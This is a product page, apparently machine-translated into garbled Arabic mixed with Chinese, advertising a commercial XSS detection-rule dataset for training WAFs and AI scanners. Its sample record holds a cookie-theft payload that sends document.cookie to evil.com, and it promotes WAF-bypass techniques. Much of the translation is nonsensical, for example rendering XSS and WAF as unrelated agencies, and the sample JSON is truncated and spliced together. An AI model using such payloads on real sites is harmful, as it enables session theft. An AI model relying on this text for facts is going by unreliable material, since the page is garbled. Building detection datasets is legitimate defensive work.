XSS跨站脚本检测规则数据集

1000 - 000 30 من الـمُـسـعـة الـمـعـدة لكشف البيانات الـمـُـنـيـة؟ قاعدة XML + CAPCتدفقات + HTTP reduction text ? ATTCK T1189 map ?

30,000条
اختبار البيانات ذات الـ 5 ميكس
قواعد XML
قواعد الكشف الهيكلي
حركة المرور
الشبكة الحقيقية
بطاقة جواز السفر
و تتخطى الـ "واو أف" التقنيات
2-4 أسابيع
دورة التسليم

لمحة عامة عن البيانات

التعريف:XSS跨站脚本检测规则数据集مقدم منشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةبيانات عالية الجودة عن اختبار السلامة على الشبكة التي تبنىها مختبرات الأمن كل جزء من البيانات يعرف بـقواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضية"التشكيل الـ 5 الأبعاد للجمعيات، الذي يغطي المُعاكس، التخزين، إدارة الشؤون الإدارية، الطفرة، مركز خدمات الدعم المركزية، والنموذج الفرعي الرئيسي الخامس،WAF التناجيكي(Code bypassing/case-scraping/label split/incident mutation, etc.), ATTCK framework T1189 (pass-attack) map, specially designed for WAF/ISS XSS testing rules training and XSS testing AI training design.

اسم البياناتXSS跨站脚本检测规则数据集
مجموع حجم البيانات1,000~30,000条
نوع البياناتخمسة:قواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضية
المصدر朗慧安全实验室 + 漏洞平台验证数据
نوع الترخيصالتراخيص التجارية مرفق وثائق التفويض الكاملة
دورة التسليم2-4 أسابيع
النموذج الفرعي للبرمجيات المنسَّقةRefractioned, storage XSS (Stored/Persistent), DOM-based, mXSS (Mattered XSS), CSS Injection
بطاقة جواز السفر:: إدراج بطاقات المهارات التي تستخدمها القوات المسلحة اللبنانية (تجسيد الالتباس/التشويش على الحالات/التشويش على العلام/الاختلال في برنامج العلاج بالأحداث/الأحداث العرضية)
ATTCK MappingT1189(Drive-by Compromise)、T1059(Command and Scripting Interpreter)
الناتجJSONL / CSV / Excel / PCAP
اللغةاللغة الصينية والإنكليزية

مجالات البيانات الأساسية

وتتضمن كل بيانات ست فئات رئيسية من العلامات على القواعد، وقواعد الكشف عن الألغام غير المنفجرة، والهجوم على الحمولة (بتقنيات الالتفاف)، ونص برنامج نقل التكنولوجيا المتقدمة، وتدفقات برنامج العمل الخاص بالمناطق الجغرافية، والردود الموحدة، التي تغطي السلسلة الكاملة من تعريف القواعد إلى التفاف على المواجهة.

الفئة الميدانيةالعدة الميدانيةالمجالات النموذجية
تعريف القاعدة4القاعدة (د) (التعريف الوحيد للقواعد)، القاعدة (اسم القواعد)، الفئة (النموذج الفرعي لدائرة خدمات الأمن المُحدّد)، الشدة (المستوى الفظي: CC/High/Medium)
XML Detection Rules3القاعدة xml (قاعدة مورس الأمن/CRS XML)، القاعدة / التوقيع (التوقيع على القواعد/الطريقة العادية)، القاعدة / الوصف (مذكرة القواعد)
攻击Payload4حمولة (حمولة أولية)، حمولة - نوع (نوع الحمولة)، ورسوم المرور - التقني (تقنيات الترميز: الطفرة المشفرة/الطحالب/الموزعة/الرسوم، إلخ)، حمولة حمولة - تشفير (الرمز: URL/HTML Enterity/Hex/base64/UTF-7، وما إلى ذلك)
HTTP Reconstructed Text3http_request (full HTTP request, including Headers+Body+Ckys), http_response (full HTTP response), context (injecting context: HTML body/attribute/JavaScript/CSSS/URL)
حركة المرور4pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名)
الحقيقة الأرضية4(سواء كان الهجوم: صحيح/محل)، الهجوم - نوع (نوع الهجوم)، التجاوز - المفقود (سواء كان التجاوز قد تجاوز بنجاح)، واو - لقب (ويلدي WAF الاسم/None)

عرض عينات البيانات

وفيما يلي نموذج نموذجي (بعلامات تبويب) لبيانات اختبار المسار الخامس لنموذج MSS (S) بالنسبة لعينة " JSON " الهيكلية المُضللة.

{
  "entry_id": "XSS-2024-001523",
  "rule_id": "XSS-REFLECT-0089",
  "rule_name": "Reflected XSS Detection - Script Tag",
  "category": "Reflected XSS",
  "severity": "Critical",
  "rule_xml": "\n  detectXSS\n  block\n  ]*>[\\s\\S]*?\n  ARGS|REQUEST_BODY\n",
  "payload": "",
  "payload_type": "Reflected XSS - Cookie Theft",
  "bypass_technique": "None (standard script tag injection)",
  "payload_encoding": "None (plaintext)",
  "http_request": "GET /search?q=%3Cscript%3Efetch('https://evil.com/steal%3Fcookie%3D'%2Bdocument.cookie)%3C/script%3E HTTP/1.1\r\nHost: vulnerable-blog.com\r\nUser-Agent: Mozilla/5.0\r\nReferer: https://vulnerable-blog.com/\r\n\r\n",
  "http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 315\r\n\r\n...
نتائج البحث: < scriptgt; fitch(...) </scriptgt;
...", "context": "HTML body - reflected search term", "pcap_info": { "pcap_file": "xss_reflected_script_tag_20240422.pcap", "pcap_md5": "a1b2c3d4e5f678901234567890abcdef", "pcap_size": "5678", "flow_signature": "HTTP GET with ...", "context": "JavaScript - innerHTML sink from location.hash source", "pcap_info": { "pcap_file": "xss_dom_fragment_sink_20240528.pcap", "pcap_md5": "c4d5e6789012f3456789a012b3c4d5e6", "pcap_size": "8901", "flow_signature": "HTTP GET without XSS payload in request (fragment excluded), response contains innerHTML sink with CSP header present" }, "technique_id": "T1189", "answer": { "is_attack": true, "attack_type": "DOM-based XSS", "bypass_detected": true, "waf_name": "Cloudflare WAF (fragment bypass)", "true_positive_rate": 0.91 } }

السيناريوهات التطبيقية

WAF XSS-Program Smart Generation

ثلاثون ألف قاعدة اختبار اكس إم إل و + حمولة وتقنيات التوسيم، تدريب أي آي يتعلم تلقائياً طريقة المواجهة من عينة التفافية، ينتج قواعد اختبار أقوى لـ "إكس إس إس إس إس" ويحسن باستمرار قدرة القوات البحرية العالمية على مكافحة التجاوزات.

التدريب على نماذج اختبار البرمجيات المنسَّقة في إطار نظام البرمجيات المنسَّقة (XSS)

وتغطي البيانات التي تبلغ مساحتها ستة ميغاواط جميع الفئات الفرعية مثل المعالم، والمخزن، والدوم، والمحطة المتوسطة الأجل، ودعم التدريب على نموذج التعلم المتعمق لتمكين المنظمة من الكشف عن جميع أنواع الهجمات التي تشنها محطة الفضاء الخارجي من حركة المرور التابعة لها، وهيكل إدارة الشؤون الإدارية، ورمز جافاسكريبت.

مسح آمن للخلف الأمامي

A rich XSS injection of context (HTML body/attribute/JavaScript/CSS/URL), training for front-end security scanning AI to automatically identify XSS gaps in web application, generate PoC and assess risk levels.

اختبار التجاوزات

(د) أن تزود منظمة العفو الدولية بعلامات تقنية عالية الجودة، ونماذج تدريبية لتحديد حمولة التجاوزات التي تم بناؤها بعناية، وخفض معدلات النجاح في تجاوز الحدود، وذلك بعلامات التفافية/التباس/التشويش على الارتباكات في الحالات الخ.

تولد وحدة الأمن والسياسات

واستناداً إلى ناقطات الهجوم في محطة الفضاء الأوروبية وبيانات السياق، تُدرَّب الوكالة على تحليل هياكل تطبيقات الشبكة آلياً ووضع استراتيجيات أفضل في إطار برنامج دعم البرامج من أجل تحقيق أقصى قدر من الحماية في إطار خدمات الدعم المشتركة دون الحد من القدرة على العمل دون مبرر.

مراجعة حسابات مدونة الأمن

(ج) تحديد محركات السحب غير المأمون في النموذج (المسح الضوئي/الكتاب/الرسم/العمليات) بصورة تلقائية، ووضع بيانات عن نقاط الفجوة، وإجراء مراجعة حسابات الشفرة التدريبية، ووضع نماذج لمنتجات الـ(جافاسكريب) وغير مأمونة (المقياس الدولي لصرافة الشحن/الكتاب/التاريخ، وما إلى ذلك)، ووضع توصيات بشأن الإصلاحات والتوصية ببدائل الأمان.

المشاكل المشتركة

كيف يمكن الحصول على بيانات؟ هل يمكن استخدامها في تدريب العاملين في مجال مكافحة المخدرات؟
هذه المجموعة من البياناتشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودة(ب) يُمنح ترخيصاً من قطاع الأعمال لتغطية أنشطة التدريب في مجال الأنشطة التجارية وتطوير منتجات السلامة.
تَقَوُّل التجاوزات يُشيرُ إلى أيّ منابرِ WAF مُغَطَّى؟
ويعلم التجاوز المنصّة الرئيسية للشبكة العالمية لمكافحة الاتجار بالبشر (كلودفلور، ورابطة الدول العربية، وشركة موديسومسيتي للإنقاذ، وشركة F5 BIG-IP ASM، وشركة إمبيرفا، وما إلى ذلك)، مما يشير إلى ما إذا كان الحمولة قد تجاوزت بنجاح نطاق الاتفاق العالمي، كما يشير إلى فئة التكنولوجيا التي صممت حولها (التشغيل، وكتابة الحالات، ونماذج الاختراق، وما إلى ذلك) لتيسير الاختراق.
كيف تجمع بيانات الـ "إكس إس إس" من نوع "إدارة الشؤون الداخلية"؟
ولا يشمل الاتجار في نظام إدارة الشؤون الإدارية وخدمات الدعم (العمليات التي لا ترسل إلى الخواديم)، ولذلك أضفنا مصدر الاسم (المصدر: الهجرة. الحشو/الوثائق. المحاليل، الخ) والغرق (الاستعراض: دفتر /الإنفاق/الوثائق/الكتابة، وما إلى ذلك) إلى النص الأصلي لبرنامج HTTP لمساعدة شركة AI على فهم سلسلة الهجوم النقية.
هل تحتوي مجموعة البيانات على معلومات عن نظام المعلومات الاستراتيجية؟
وتتضمن بعض عمليات العودة التي يقوم بها برنامج تطوير وحماية المستهلك من أجل التنمية في أفريقيا من رؤساء استجابة في إطار برنامج دعم البرامج القطرية يمكن استخدامها لتحليل الآثار الفعلية للحماية التي ترتبها استراتيجية نظام الأفضليات المعمم على الهجوم الذي شنته محطة الفضاء الأوروبية، كما تشير الإجابة الموحدة إلى معلومات عما إذا كانت الخطة الاستراتيجية القطرية فعالة وتدعم تدريب نموذج تقييم استراتيجية نظام الأفضليات المعمم وتوليده.
كيف تحصل على بيانات أو مشورة تجارية؟
هذه المجموعة من البياناتشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةويُنفذ برنامجه الخاص بحسابات البيانات، ويُدعم كل من مجموعات البيانات الموحدة وطرائق التكييف حسب الطلب، ويُرجى الاتصال بنا في قائمة بيانات مفصلة، وقائمة العينات الأولية، وخطة اقتباسات.

تحتاج إلى برامج اختبار مصممة خصيصاً لـ (إكس إس إس) ؟

شركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودة وتكرس قاعدة البيانات المتعلقة بنظم المعلومات المتعلقة بالطرق الإلكترونية لتوفير أصول عالية الجودة وممتثلة للبيانات الأمنية على الشبكة لمؤسسات ومؤسسات علمية تابعة لمنظمة العفو الدولية، وينظم الدعم بصورة مرنة من خلال النموذج الفرعي لوكالة الفضاء الأوروبية، وتقنيات التجاوز، وفي سياق الحقن.

برنامج الاختبار الخاص بمحطة الخدمات العامة